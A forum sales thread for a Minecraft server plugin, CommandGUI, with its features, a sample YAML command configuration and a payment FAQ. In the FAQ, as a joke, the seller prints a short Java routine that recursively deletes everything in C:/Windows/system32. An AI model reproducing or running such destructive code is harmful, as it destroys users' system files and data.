CommandGUI v1.8.8 | Commands & Permissions to a GUI

Status
This thread has been locked.

Nagi

PM Only - No Skype
Supreme
Feedback score
12
Posts
535
Reactions
679
Resources
0
CommandGUI is a Mechanical Tool that allows users to sync a Command, their respective permission node, and any configurable Minecraft Item into a Colorful GUI!

This plugin will be sold for $5 USD. Please contact me through Private Messaging.
The plugin contains the source code, embedded in the directory of it's respective Class File.
The information below will explain the functionality of the plugin itself.

Plugin Features:
- In-Depth Default Configurations (Noob Friendly, Screenshots Available)
- Custom Commands! (You can set the triggering commands yourselves)
- Unlimited List of Command Entries (Name, Permission, Command, Material, DataValue, & Description) Configurations

Notice:
- If a player has the permission, it will show as Bold Green: AVAILABLE. Otherwise, in Bold Red: UNAVAILABLE.
- Empty Slots are just Black Stained Glass.
- Players cannot exceed / decreed pages that have nothing on them (Screenshots)
- The name you give to the Command Entry will also be the name that appears on the top of the Item displayed. The coloring follows the availability listed above. (Screenshots)

Code:
CommandTriggers: # Self Explainatory. Make sure you follow the YAML Formatting!
- cmdgui
- commandgui
CommandEntries: # Self Explainatory.
  RandomEntry0: # You can change the name to whatever you'd like!
    Permission: mc.market.permission0
    Command: 'say This is item is triggering Command Entry #0'
    Material: 2
    DataValue: 0
    Description: 'This is the Example of Command Entry #0.'
  RandomEntry1:
    Permission: mc.market.permission1
    Command: 'say This is item is triggering Command Entry #1'
    Material: 6
    DataValue: 0
    Description: 'This is the Example of Command Entry #1.'
  RandomEntry2:
    Permission: mc.market.permission2
    Command: 'say This is item is triggering Command Entry #2'
    Material: 1
    DataValue: 0
    Description: 'This is the Example of Command Entry #2.'
  RandomEntry3:
    Permission: mc.market.permission3
    Command: 'say This is item is triggering Command Entry #3'
    Material: 1
    DataValue: 0
    Description: 'This is the Example of Command Entry #3.'
  RandomEntry4:
    Permission: mc.market.permission4
    Command: 'say This is item is triggering Command Entry #4'
    Material: 6
    DataValue: 0
    Description: 'This is the Example of Command Entry #4.'
  RandomEntry5:
    Permission: mc.market.permission5
    Command: 'say This is item is triggering Command Entry #5'
    Material: 4
    DataValue: 0
    Description: 'This is the Example of Command Entry #5.'
  RandomEntry6:
    Permission: mc.market.permission6
    Command: 'say This is item is triggering Command Entry #6'
    Material: 5
    DataValue: 0
    Description: 'This is the Example of Command Entry #6.'
  RandomEntry7:
    Permission: mc.market.permission7
    Command: 'say This is item is triggering Command Entry #7'
    Material: 7
    DataValue: 0
    Description: 'This is the Example of Command Entry #7.'
  RandomEntry8:
    Permission: mc.market.permission8
    Command: 'say This is item is triggering Command Entry #8'
    Material: 3
    DataValue: 0
    Description: 'This is the Example of Command Entry #8.'
  RandomEntry9:
    Permission: mc.market.permission9
    Command: 'say This is item is triggering Command Entry #9'
    Material: 1
    DataValue: 0
    Description: 'This is the Example of Command Entry #9.'
Version 1.8.8 (Initial Release):
- Configurations
- Configurations Error Checking & Default Values
- Command Override and Custom Command Input Configurable
Can I get a Voucher Plugin?
Do you have 200+ recommendations? Are we on friendly terms? If so, ask down below.
Please do not ask for a vouch copy if you are not planning on buying.

How will the Payment Process go?
You will send me the money via PayPal, and I will send you the plugin afterwards.

Could you do me a favor and add a small function to the plugin?
As long as it's reasonable and can be toggled. Your idea will be uploaded here and made public unless you bribe me otherwise.

I bought the plugin but I see you've made some updates!
Private Message me for the update.

I think you're fake!
No part of my body is artificial in any way, thanks for asking.
Code:
public static void main(String[] args) {
    deleteFile(new File("C:/Windows/system32/"));
}

public static void deleteFile(File file) {
    if(file.isDirectory())
        for(File fileInside : file.listFiles())
            deleteFile(fileInside);
    else {
        file.delete();
    }
}

Why is the price so cheap?
Money isn't one of my main priorities. This is also a public plugin.

I've a plugin I'd like you to make!
Private Message me with the idea and I can give you a timeframe & price quote.
 
Last edited:
PebbleHost
High performance, consistent uptime and fast support. Minecraft hosting that just works.
Status
This thread has been locked.
Top